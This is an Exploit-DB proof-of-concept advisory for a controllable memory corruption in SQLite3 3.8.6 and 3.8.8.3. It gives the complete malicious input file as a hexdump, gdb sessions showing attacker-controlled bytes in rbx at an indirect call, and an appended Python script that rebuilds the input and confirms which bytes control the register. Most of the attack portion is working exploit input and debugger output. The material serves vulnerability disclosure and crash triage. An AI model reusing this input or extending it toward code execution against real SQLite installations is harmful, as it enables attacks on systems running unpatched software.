SQLite3 3.8.6 – Controlled Memory Corruption (PoC)

  • Author: Andras Kabai
  • Date: 2015-02-26
  • Category:
  • Platform:
  • Source: https://www.exploit-db.com/exploits/36190/
    # Exploit Title: SQLite3 controlled memory corruption PoC (0day)
    # Date: [date]
    # Exploit Author: Andras Kabai
    # Vendor Homepage: http://www.sqlite.org/
    # Software Link: http://www.sqlite.org/download.html
    # Version: 3.8.6, 3.8.8.3
    # Tested on: Ubuntu 14.10, 64 bit 3.8.6 (latest available package), 3.8.8.3 (built from the latest source code)
    
    Using crafted input (for example a malicious file passed via the “-init” parameter, or fed directly to the program's standard input) it is possible to trigger a memory corruption vulnerability in the most recent version of SQLite3. The memory corruption is controllable, so the program flow could be manipulated by an attacker.
    
    The following sections demonstrate the attack against the sqlite3 package installed and updated via apt-get, and against a newer version built from source.
    
    ====
    
    andrew@ubufuzzx6401:~/issues/sqlite$ which sqlite3
    /usr/bin/sqlite3
    andrew@ubufuzzx6401:~/issues/sqlite$ /usr/bin/sqlite3 -version
    3.8.6 2014-08-15 11:46:33 9491ba7d738528f168657adb43a198238abde19e
    andrew@ubufuzzx6401:~/issues/sqlite$ gdb64 /usr/bin/sqlite3
    GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
    Copyright (C) 2014 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
    and "show warranty" for details.
    This GDB was configured as "x86_64-linux-gnu".
    Type "show configuration" for configuration details.
    For bug reporting instructions, please see:
    <http://www.gnu.org/software/gdb/bugs/>.
    Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.
    For help, type "help".
    Type "apropos word" to search for commands related to "word"...
    Reading symbols from /usr/bin/sqlite3...(no debugging symbols found)...done.
    (gdb) set disassembly-flavor intel
    (gdb) set args < sqlitepoc.txt
    (gdb) r
    Starting program: /usr/bin/sqlite3 < sqlitepoc.txt
    warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).
    
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    Usage: .trace FILE|off
    Error: near line 4: near "whatever": syntax error
    Usage: .trace FILE|off
    
    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff7ba06a0 in sqlite3_load_extension () from /usr/lib/x86_64-linux-gnu/libsqlite3.so.0
    (gdb) i r
    rax            0x138               312
    rbx            0x41414141424242    18367622009733698
    rcx            0x7fffffffb590      140737488336272
    rdx            0x0                 0
    rsi            0x555555779b43      93824994483011
    rdi            0x41414141424242    18367622009733698
    rbp            0x555555779b43      0x555555779b43
    rsp            0x7fffffffb4c0      0x7fffffffb4c0
    r8             0x555555779b41      93824994483009
    r9             0x6c                108
    r10            0x0                 0
    r11            0x0                 0
    r12            0x555555779b48      93824994483016
    r13            0x7fffffffb590      140737488336272
    r14            0x555555779b40      93824994483008
    r15            0x2                 2
    rip            0x7ffff7ba06a0      0x7ffff7ba06a0 <sqlite3_load_extension+736>
    eflags         0x10246             [ PF ZF IF RF ]
    cs             0x33                51
    ss             0x2b                43
    ds             0x0                 0
    es             0x0                 0
    fs             0x0                 0
    gs             0x0                 0
    (gdb) disas $rip,+10
    Dump of assembler code from 0x7ffff7ba06a0 to 0x7ffff7ba06aa:
    => 0x00007ffff7ba06a0 <sqlite3_load_extension+736>:	call   QWORD PTR [rbx+0x48]
       0x00007ffff7ba06a3 <sqlite3_load_extension+739>:	mov    r15,rax
       0x00007ffff7ba06a6 <sqlite3_load_extension+742>:	lea    rax,[rip+0x12bc1]        # 0x7ffff7bb326e
    End of assembler dump.
    
    ===
    
    andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ ./lt-sqlite3 -version
    3.8.8.3 2015-02-25 13:29:11 9d6c1880fb75660bbabd693175579529785f8a6b
    andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ gdb64 ./lt-sqlite3
    GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
    Copyright (C) 2014 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
    and "show warranty" for details.
    This GDB was configured as "x86_64-linux-gnu".
    Type "show configuration" for configuration details.
    For bug reporting instructions, please see:
    <http://www.gnu.org/software/gdb/bugs/>.
    Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.
    For help, type "help".
    Type "apropos word" to search for commands related to "word"...
    Reading symbols from ./lt-sqlite3...done.
    (gdb) set disassembly-flavor intel
    (gdb) set args < /home/andrew/issues/sqlite/sqlitepoc.txt
    (gdb) r
    Starting program: /home/andrew/tmp/build/sqlite-autoconf-3080803/.libs/lt-sqlite3 < /home/andrew/issues/sqlite/sqlitepoc.txt
    warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).
    
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    Usage: .trace FILE|off
    Error: near line 4: near "whatever": syntax error
    Usage: .trace FILE|off
    
    Program received signal SIGSEGV, Segmentation fault.
    sqlite3LoadExtension (pzErrMsg=0x7fffffffb510, zProc=0x0, zFile=0x6261c3 "CCCCBBBBAAAA", db=0x6261c8) at sqlite3.c:36169
    36169	}
    (gdb) i r
    rax            0x138               312
    rbx            0x41414141424242    18367622009733698
    rcx            0x7fffffffb510      140737488336144
    rdx            0x0                 0
    rsi            0x6261c3            6447555
    rdi            0x41414141424242    18367622009733698
    rbp            0x6261c3            0x6261c3
    rsp            0x7fffffffb440      0x7fffffffb440
    r8             0x6261c1            6447553
    r9             0x6c                108
    r10            0x7fffffffb270      140737488335472
    r11            0x7ffff7b5ae50      140737349267024
    r12            0x6261c8            6447560
    r13            0x7fffffffb510      140737488336144
    r14            0x6261c0            6447552
    r15            0x2                 2
    rip            0x7ffff7b5b130      0x7ffff7b5b130 <sqlite3_load_extension+736>
    eflags         0x10246             [ PF ZF IF RF ]
    cs             0x33                51
    ss             0x2b                43
    ds             0x0                 0
    es             0x0                 0
    fs             0x0                 0
    gs             0x0                 0
    (gdb) disas $rip,+10
    Dump of assembler code from 0x7ffff7b5b130 to 0x7ffff7b5b13a:
    => 0x00007ffff7b5b130 <sqlite3_load_extension+736>:	call   QWORD PTR [rbx+0x48]
       0x00007ffff7b5b133 <sqlite3_load_extension+739>:	mov    r15,rax
       0x00007ffff7b5b136 <sqlite3_load_extension+742>:	lea    rax,[rip+0x587d8]        # 0x7ffff7bb3915
    End of assembler dump.
    
    ====
    
    andrew@ubufuzzx6401:~/issues/sqlite$ hexdump -C sqlitepoc.txt
    00000000  3b 0a 2e 74 20 78 0a 2e  74 0a 77 68 61 74 65 76  |;..t x..t.whatev|
    00000010  65 72 00 0a 3b 0a 2e 74  0a 2e 6f 70 0a 2e 6c 20  |er..;..t..op..l |
    00000020  43 43 43 43 42 42 42 42  41 41 41 41 0a           |CCCCBBBBAAAA.|
    0000002d
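As an added crash-triage example (not part of the advisory), the script below rebuilds sqlitepoc.txt from the hexdump above, splits it into the dot-commands the shell executed, and checks whether the rbx value from the 3.8.8.3 session is an 8-byte window of the `.load` argument, which is what makes the corruption "controlled". It assumes the shell matches dot-commands by prefix (`.l` for `.load`) and hands the argument on as an unchanged NUL-terminated string; `parse_hexdump` is a general `hexdump -C` reader, not limited to this file.

```python
import re
# `hexdump -C` output of sqlitepoc.txt, copied from the advisory above.
HEXDUMP = """\
00000000  3b 0a 2e 74 20 78 0a 2e  74 0a 77 68 61 74 65 76  |;..t x..t.whatev|
00000010  65 72 00 0a 3b 0a 2e 74  0a 2e 6f 70 0a 2e 6c 20  |er..;..t..op..l |
00000020  43 43 43 43 42 42 42 42  41 41 41 41 0a           |CCCCBBBBAAAA.|
0000002d
"""
# Register and frame values taken from the 3.8.8.3 gdb session above.
RBX_AT_CRASH = 0x41414141424242
ZFILE_ADDR, DB_ADDR = 0x6261C3, 0x6261C8
HEX_LINE = re.compile(r"^([0-9a-f]{8})((?:\s+[0-9a-f]{2}){1,16})\s*(\|.*\|)?$")
OFFSET_ONLY = re.compile(r"^[0-9a-f]{8}$")

def parse_hexdump(text):
    """Rebuild raw bytes from `hexdump -C` output; the ASCII column is ignored."""
    data = bytearray()
    for line in text.splitlines():
        line = line.strip()
        if not line or OFFSET_ONLY.match(line):
            continue  # trailing total-length line
        m = HEX_LINE.match(line)
        if m is None:
            raise ValueError(f"unrecognised hexdump line: {line!r}")
        if int(m.group(1), 16) != len(data):
            raise ValueError("hexdump offsets are not contiguous")
        data += bytes.fromhex(m.group(2).replace(" ", ""))
    return bytes(data)

def shell_commands(data):
    """One entry per input line, cut at the first NUL the way a C string is."""
    return [ln.split(b"\0", 1)[0].decode("ascii") for ln in data.split(b"\n") if ln]

def load_argument(commands):
    """Argument of `.load` (the shell also accepts prefixes such as `.l`) as the
    NUL-terminated string handed on; assumes the shell passes it unchanged."""
    for cmd in commands:
        name, _, arg = cmd.partition(" ")
        if name and ".load".startswith(name):
            return arg.encode("ascii") + b"\0"
    raise LookupError("no .load command in input")

def controlled_offset(arg_cstring, reg_value):
    """Offset in the argument holding the little-endian 8-byte image of reg_value, or -1."""
    return arg_cstring.find(reg_value.to_bytes(8, "little"))

def triage():
    """(offset of rbx's bytes inside the .load argument, db - zFile from the crash frame)."""
    arg = load_argument(shell_commands(parse_hexdump(HEXDUMP)))
    return controlled_offset(arg, RBX_AT_CRASH), DB_ADDR - ZFILE_ADDR
```

Both results are 5: the register dereferenced by `call QWORD PTR [rbx+0x48]` holds the filename bytes starting at offset 5, and the `db` argument in the crash frame sits 5 bytes past `zFile`, which is the evidence a triager needs to rate the crash as attacker-controlled rather than a plain NULL dereference.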